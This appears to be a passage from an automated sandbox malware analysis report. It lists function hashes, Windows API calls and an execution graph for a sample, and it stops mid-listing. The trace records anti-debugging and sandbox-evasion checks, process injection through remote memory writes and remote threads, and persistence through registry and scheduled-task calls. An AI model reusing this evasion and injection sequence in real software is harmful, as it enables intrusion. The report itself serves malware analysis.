                                                                                                                                                                                                                • Opcode ID: c0dfc14e31f44cf4e014f2097966a418c44037349c65fa29245ceabfdf450b4f
                                                                                                                                                                                                                • Instruction ID: aaf8394e51d366f1cbaff26a72c6c9576496a1c1027a8e2768253c57e0b02b0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0dfc14e31f44cf4e014f2097966a418c44037349c65fa29245ceabfdf450b4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01F2B19043289FEB20CF54D88579ABBB4FB01304F40809DE98D93280C3B51A94CB96
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403586
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004035A0
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403643
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403662
                                                                                                                                                                                                                • wcsstr.MSVCRT ref: 00403695
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040372B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040375C
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 00403763
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040376A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0040379B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037FA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403807
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040380A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040381D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403820
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040382D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403830
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                                • String ID: 00-->$<Actions $p=<u
                                                                                                                                                                                                                • API String ID: 3028510665-3770785300
                                                                                                                                                                                                                • Opcode ID: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
                                                                                                                                                                                                                • Instruction ID: 013638ac99e31dc1b3f0b1cbc1bcbf050739cfec6944e8e6b412d7e6261d8edc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03d92ed9c350a22cff9bf3ba1b65dc31ee79c9631ebe11a42a2e6577e904a005
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32A1C0B1500311ABC720DF64CC49F5B7BA8EFC8751F048A69FA49A7391D774EA04CBA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?), ref: 00402EB0
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402ED0
                                                                                                                                                                                                                • CoCreateInstance.OLE32(004043E8,00000000,00000001,004041D8,?), ref: 00402EF7
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F0F
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F2A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F48
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F66
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FEC
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FF2
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FF8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FFE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(.5@), ref: 0040303D
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00404F3C), ref: 004031E6
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0040320B
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00403229
                                                                                                                                                                                                                  • Part of subcall function 00402DC0: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00403011,00404F28), ref: 00402DC8
                                                                                                                                                                                                                  • Part of subcall function 00402DC0: HeapAlloc.KERNEL32(00000000,?,00403011,00404F28), ref: 00402DCF
                                                                                                                                                                                                                  • Part of subcall function 00402DC0: SysAllocString.OLEAUT32(00403011), ref: 00402DF0
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004032D6
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004032DC
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004032E2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                                • String ID: .5@$.5@$cmd.exe$p=<u
                                                                                                                                                                                                                • API String ID: 2839743307-1930425439
                                                                                                                                                                                                                • Opcode ID: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
                                                                                                                                                                                                                • Instruction ID: 7356d6b497d974f43c465eb486c8ab872bac2c341a44699d5e6db9722a73acc6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65F1EA75E102199FCB00DFA8C884A9EBBB9FF88710F15816AE914BB391D774AD41CF94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401FD6
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401FF0
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 00401FFF
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402039
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 0040205A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 0040207C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 00402088
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 00402096
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
                                                                                                                                                                                                                • Instruction ID: 8973f4922baf9af671f2a19144e2d86d5cf9878df638c7e503d434612b68899c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F721EB7190131477D7109BA5AE4DB9F77A8ABC8310F100276EB04F32D1DB789E41C669
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402E47
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,.5@,753CE610,00402E2E), ref: 00402E5F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402E62
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00402E6F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E72
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,.5@,.5@,753CE610,00402E2E), ref: 00402E7B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402E7E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,.5@), ref: 00402E8B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402E8E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                • String ID: .5@
                                                                                                                                                                                                                • API String ID: 2629017576-427766238
                                                                                                                                                                                                                • Opcode ID: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
                                                                                                                                                                                                                • Instruction ID: 8a0f41a42cc1d9b8d1979a4e7edab232083dfb301258e97597ac6d2db269471b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F0FEB2641211ABE6106BB59E4CF5B3A5CEF95B56F044525B708F71D0CA74CC0086B8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040160B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll$)@
                                                                                                                                                                                                                • API String ID: 1545651562-3472953331
                                                                                                                                                                                                                • Opcode ID: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
                                                                                                                                                                                                                • Instruction ID: a861cb93b7f16bf3c872219f5ba967f96d5ad720afefe63f3816ea97d3f010e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E01AB0600310DBEB009FB2AD09A563699AA94B113448836A709F21E2DA3CD810CA6D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040194A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
                                                                                                                                                                                                                • Instruction ID: 42b0d571b2b9ac5a956892dcf26f74189b3fac86f907fc126faefe0e596b578b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601A771600314DBC7149FBAAC81996B759AB88B15710443AEA09E32D3C63DDC05CBBC

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:1.7%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:80.2%
                                                                                                                                                                                                                Signature Coverage:28.8%
                                                                                                                                                                                                                Total number of Nodes:986
                                                                                                                                                                                                                Total number of Limit Nodes:36
                                                                                                                                                                                                                execution_graph 64715 402b70 64786 401000 IsDebuggerPresent 64715->64786 64717 402b81 LoadLibraryA GetModuleFileNameA 64806 403920 GetModuleFileNameA strstr 64717->64806 64720 402bb1 64822 4021b0 CreateFileA 64720->64822 64721 402ba9 ExitProcess 64726 402be6 64833 402340 CreateFileA 64726->64833 64727 402bce GetTickCount PostMessageA 64727->64726 64736 402c06 64901 4033b0 70 API calls 64736->64901 64737 402c17 IsUserAnAdmin GetModuleHandleA 64739 402c50 64737->64739 64740 402c31 GetProcAddress 64737->64740 64743 402ca2 64739->64743 64744 402c56 64739->64744 64740->64739 64742 402c43 GetCurrentProcess 64740->64742 64741 402c0b 64741->64737 64745 402c0f ExitProcess 64741->64745 64742->64739 64746 402d59 64743->64746 64747 402caa StrStrIA 64743->64747 64748 402c70 64744->64748 64749 402c5a StrStrIA 64744->64749 64754 401130 13 API calls 64746->64754 64750 402cc0 64747->64750 64751 402cfd 64747->64751 64859 401130 memset memset 64748->64859 64749->64748 64752 402c93 64749->64752 64756 401130 13 API calls 64750->64756 64904 4028b0 98 API calls 64751->64904 64902 4028b0 98 API calls 64752->64902 64759 402d64 GlobalFindAtomA 64754->64759 64761 402ccb GlobalFindAtomA 64756->64761 64764 402db4 ExitProcess 64759->64764 64765 402d74 GlobalAddAtomA IsUserAnAdmin 64759->64765 64760 402c98 64903 401520 9 API calls 64760->64903 64761->64764 64769 402cdf GlobalAddAtomA IsUserAnAdmin 64761->64769 64762 402d02 GlobalFindAtomA 64770 402d52 64762->64770 64771 402d12 GlobalAddAtomA IsUserAnAdmin 64762->64771 64766 402d95 IsUserAnAdmin 64765->64766 64767 402cf4 64765->64767 64775 402da0 64766->64775 64767->64766 64769->64766 64769->64767 64915 401520 9 API calls 64770->64915 64773 402d33 IsUserAnAdmin 64771->64773 64774 402d23 64771->64774 64778 402d3e 64773->64778 64774->64773 64779 401aa0 7 API calls 64775->64779 64776 402c9d 64776->64764 64905 401aa0 memset CreateToolhelp32Snapshot 64778->64905 64781 402dab 64779->64781 64781->64764 64783 402daf 64781->64783 64782 402d49 64782->64770 64785 401b70 32 API calls 64782->64785 64784 401b70 32 API calls 64783->64784 64784->64764 64785->64770 64787 401022 FindWindowA 64786->64787 64788 40111b 64786->64788 64787->64788 64789 401038 memset CreateToolhelp32Snapshot 64787->64789 64788->64717 64790 401063 Process32First 64789->64790 64797 4010d1 64789->64797 64792 401083 StrStrIA 64790->64792 64791 401aa0 7 API calls 64793 4010df 64791->64793 64794 401097 Process32Next 64792->64794 64795 4010a3 64792->64795 64796 401aa0 7 API calls 64793->64796 64805 40110e 64793->64805 64794->64792 64794->64795 64795->64797 64798 4010b3 GetHandleInformation 64795->64798 64800 4010ed 64796->64800 64797->64791 64797->64805 64798->64797 64799 4010c3 64798->64799 64799->64797 64801 4010ca FindCloseChangeNotification 64799->64801 64802 401aa0 7 API calls 64800->64802 64800->64805 64801->64797 64803 4010fb 64802->64803 64804 4010ff PathFileExistsA 64803->64804 64803->64805 64804->64805 64805->64717 64807 403974 64806->64807 64808 402ba5 64806->64808 64916 403870 RegOpenKeyExA 64807->64916 64808->64720 64808->64721 64811 403981 GetUserNameA CharUpperA strstr 64811->64808 64812 4039b8 strstr 64811->64812 64812->64808 64813 4039d1 strstr 64812->64813 64813->64808 64814 4039ea strstr 64813->64814 64814->64808 64815 403a03 strstr 64814->64815 64815->64808 64816 403a1c GetSystemWindowsDirectoryA GetVolumeInformationA 64815->64816 64816->64808 64817 403a5c 64816->64817 64817->64808 64818 403a78 GetModuleFileNameA StrStrIA 64817->64818 64818->64808 64819 403aa0 StrStrIA 64818->64819 64819->64808 64820 403ab2 StrStrIA 64819->64820 64820->64808 64821 403ac4 64820->64821 64821->64808 64823 402330 64822->64823 64824 402300 DeviceIoControl CloseHandle 64822->64824 64825 4020c0 memset SHGetFolderPathA 64823->64825 64824->64823 64826 402187 64825->64826 64827 40211e PathAppendA SetCurrentDirectoryA 64825->64827 64829 402192 FindWindowA 64826->64829 64830 40218b FreeLibrary 64826->64830 64827->64826 64828 402141 LoadLibraryA 64827->64828 64828->64826 64831 402155 GetProcAddress 64828->64831 64829->64726 64829->64727 64830->64829 64831->64826 64832 402165 64831->64832 64832->64826 64834 4023e3 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 64833->64834 64835 402424 64833->64835 64834->64835 64836 402430 SHGetFolderPathA 64835->64836 64837 402515 64836->64837 64838 402457 64836->64838 64840 402520 SHGetFolderPathA 64837->64840 64838->64838 64839 4024cc MoveFileA 64838->64839 64839->64837 64841 40264f 64840->64841 64842 40254b CreateFileA 64840->64842 64845 402660 CoInitializeEx 64841->64845 64842->64841 64844 4025b1 11 API calls 64842->64844 64844->64841 64846 40269f GetModuleFileNameW SysAllocString 64845->64846 64847 40268e 64845->64847 64848 4026cd SysAllocString 64846->64848 64853 402846 64846->64853 64847->64846 64849 4028a4 IsUserAnAdmin 64847->64849 64850 402833 SysFreeString 64848->64850 64851 4026de CoCreateInstance 64848->64851 64849->64736 64849->64737 64852 402843 SysFreeString 64850->64852 64850->64853 64855 402705 64851->64855 64857 402807 64851->64857 64852->64853 64853->64849 64854 40289e CoUninitialize 64853->64854 64854->64849 64855->64850 64856 402793 CoCreateInstance 64855->64856 64855->64857 64858 4027b5 64856->64858 64857->64850 64858->64857 64860 40118a IsUserAnAdmin 64859->64860 64861 4012ce GetCurrentProcessId 64859->64861 64862 401280 RegOpenKeyExA 64860->64862 64863 401198 RegCreateKeyExA 64860->64863 64870 401b70 64861->64870 64864 4012b6 64862->64864 64865 40129e RegSetValueExA 64862->64865 64863->64864 64866 4011be GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 64863->64866 64864->64861 64867 4012bd RegFlushKey RegCloseKey 64864->64867 64865->64864 64868 401221 64866->64868 64867->64861 64869 40125e RegSetValueExA 64868->64869 64869->64864 64871 401dd3 Sleep 64870->64871 64873 401b86 64870->64873 64871->64764 64874 401ba5 64873->64874 64875 401b9b Sleep 64873->64875 64921 401fb0 memset CreateToolhelp32Snapshot 64873->64921 64876 401fb0 11 API calls 64874->64876 64875->64873 64875->64874 64877 401bac 64876->64877 64877->64871 64878 401bb4 OpenProcess 64877->64878 64878->64871 64879 401bcf GetModuleHandleA 64878->64879 64880 401c06 64879->64880 64881 401beb GetProcAddress 64879->64881 64883 401c0c GetModuleHandleA 64880->64883 64884 401c3f VirtualAllocEx 64880->64884 64881->64880 64882 401bf9 GetCurrentProcess 64881->64882 64882->64880 64885 401c22 GetProcAddress 64883->64885 64888 401c2e 64883->64888 64886 401db0 GetHandleInformation 64884->64886 64887 401c82 WriteProcessMemory 64884->64887 64885->64888 64886->64871 64889 401dc6 64886->64889 64890 401cae 64887->64890 64891 401d1f WriteProcessMemory FlushInstructionCache CreateRemoteThread 64887->64891 64888->64884 64888->64886 64889->64871 64894 401dcc CloseHandle 64889->64894 64895 401cb1 VirtualAlloc 64890->64895 64900 401d19 64890->64900 64892 401d62 GetHandleInformation 64891->64892 64893 401d8e RtlCreateUserThread 64891->64893 64896 401d85 64892->64896 64897 401d78 64892->64897 64893->64886 64894->64871 64895->64890 64898 401cc9 memcpy WriteProcessMemory VirtualFree 64895->64898 64896->64886 64897->64896 64899 401d7e CloseHandle 64897->64899 64898->64890 64899->64896 64900->64891 64901->64741 64902->64760 64903->64776 64904->64762 64906 401ae7 Process32First 64905->64906 64907 401adc 64905->64907 64908 401b07 StrStrIA 64906->64908 64907->64782 64909 401b16 Process32Next 64908->64909 64910 401b22 64908->64910 64909->64908 64909->64910 64911 401b50 64910->64911 64912 401b32 GetHandleInformation 64910->64912 64911->64782 64912->64911 64913 401b42 64912->64913 64913->64911 64914 401b49 FindCloseChangeNotification 64913->64914 64914->64911 64915->64776 64917 4038a6 RegQueryValueExA 64916->64917 64920 4038d5 64916->64920 64918 4038db RegCloseKey 64917->64918 64919 4038cb RegCloseKey 64917->64919 64918->64920 64919->64920 64920->64808 64920->64811 64922 401ff0 GetLastError 64921->64922 64923 402048 Module32First 64921->64923 64925 4020ab 64922->64925 64926 401fff SwitchToThread CreateToolhelp32Snapshot 64922->64926 64924 402064 64923->64924 64928 402015 64923->64928 64927 402070 StrStrIA 64924->64927 64925->64873 64926->64925 64926->64928 64929 402082 StrStrIA 64927->64929 64930 40208e Module32Next 64927->64930 64931 402023 GetHandleInformation 64928->64931 64932 40203f 64928->64932 64929->64928 64929->64930 64930->64927 64930->64928 64931->64932 64933 402032 64931->64933 64932->64873 64933->64932 64934 402038 FindCloseChangeNotification 64933->64934 64934->64932 64935 24c1360 64936 24c136f 64935->64936 64975 24c1000 GetPEB 64936->64975 64938 24c1384 64976 24c1090 64938->64976 64940 24c138a 64941 24c15f9 64940->64941 64942 24c13a0 GetPEB 64940->64942 65004 24c1000 GetPEB 64941->65004 64943 24c1090 GetPEB 64942->64943 64948 24c13bc 64943->64948 64945 24c1605 64946 24c1090 GetPEB 64945->64946 64947 24c160b 64946->64947 64948->64941 64985 24c1000 GetPEB 64948->64985 64950 24c13ff 64951 24c1090 GetPEB 64950->64951 64952 24c1405 64951->64952 64986 24c1000 GetPEB 64952->64986 64954 24c1425 64955 24c1090 GetPEB 64954->64955 64956 24c142b VirtualAlloc 64955->64956 64956->64941 64957 24c1444 64956->64957 64958 24c156c 64957->64958 64963 24c1000 GetPEB 64957->64963 64966 24c1090 GetPEB 64957->64966 64971 24c1090 GetPEB 64957->64971 64973 24c154b GetProcAddress 64957->64973 64987 24c1000 GetPEB 64958->64987 64960 24c159d 64961 24c1090 GetPEB 64960->64961 64962 24c15a3 64961->64962 64988 24c12c0 64962->64988 64963->64957 64967 24c14ef LoadLibraryExA 64966->64967 64967->64957 64969 24c15e8 64970 24c1090 GetPEB 64969->64970 64972 24c15ee 64970->64972 64971->64957 64999 2d37220 CreateThread 64972->64999 64973->64957 64975->64938 64977 24c10a9 64976->64977 64979 24c10b3 64976->64979 64977->64940 64978 24c119d 64978->64940 64979->64978 65005 24c1000 GetPEB 64979->65005 64981 24c1184 64982 24c1090 GetPEB 64981->64982 64983 24c118a 64982->64983 64983->64978 64984 24c1090 GetPEB 64983->64984 64984->64978 64985->64950 64986->64954 64987->64960 64989 24c12e8 64988->64989 65006 24c1000 GetPEB 64989->65006 64991 24c12fa 64992 24c1090 GetPEB 64991->64992 64993 24c1300 64992->64993 65007 24c1000 GetPEB 64993->65007 64995 24c133e 64996 24c1090 GetPEB 64995->64996 64997 24c1344 64996->64997 64997->64941 64998 24c1000 GetPEB 64997->64998 64998->64969 65000 2d37263 ExitThread 64999->65000 65001 2d37240 GetHandleInformation 64999->65001 65008 2d367d0 64999->65008 65001->65000 65002 2d37256 65001->65002 65002->65000 65003 2d3725c CloseHandle 65002->65003 65003->65000 65004->64945 65005->64981 65006->64991 65007->64995 65202 2d23440 7 API calls 65008->65202 65013 2d37215 65014 2d3681d StrStrIA 65015 2d36890 InitializeCriticalSection CreateMutexA 65014->65015 65016 2d36835 GetCommandLineA 65014->65016 65015->65013 65018 2d368c5 65015->65018 65017 2d36840 65016->65017 65017->65017 65019 2d36848 GetCommandLineW 65017->65019 65217 2d237e0 memset GetModuleFileNameA 65018->65217 65021 2d36876 65019->65021 65021->65015 65021->65021 65024 2d368cf 65024->65013 65261 2d23940 GetTickCount GetModuleHandleA 65024->65261 65026 2d368dd 65268 2d3aac0 memset GetVersionExW 65026->65268 65031 2d368f1 CreateThread 65032 2d3692b 65031->65032 65033 2d36908 GetHandleInformation 65031->65033 65720 2d33140 51 API calls 65031->65720 65034 2d3693b CreateThread 65032->65034 65035 2d36a8d 65032->65035 65033->65032 65037 2d3691e 65033->65037 65038 2d3697f CreateThread 65034->65038 65039 2d3695c GetHandleInformation 65034->65039 65689 2d37820 65034->65689 65306 2d26a50 18 API calls 65035->65306 65037->65032 65041 2d36924 CloseHandle 65037->65041 65283 2d23750 memset 65038->65283 65674 2d37b30 65038->65674 65039->65038 65042 2d36972 65039->65042 65040 2d36a92 65044 2d36a97 GetModuleHandleA 65040->65044 65041->65032 65042->65038 65045 2d36978 CloseHandle 65042->65045 65049 2d36ad0 65044->65049 65050 2d36ab5 GetProcAddress 65044->65050 65045->65038 65046 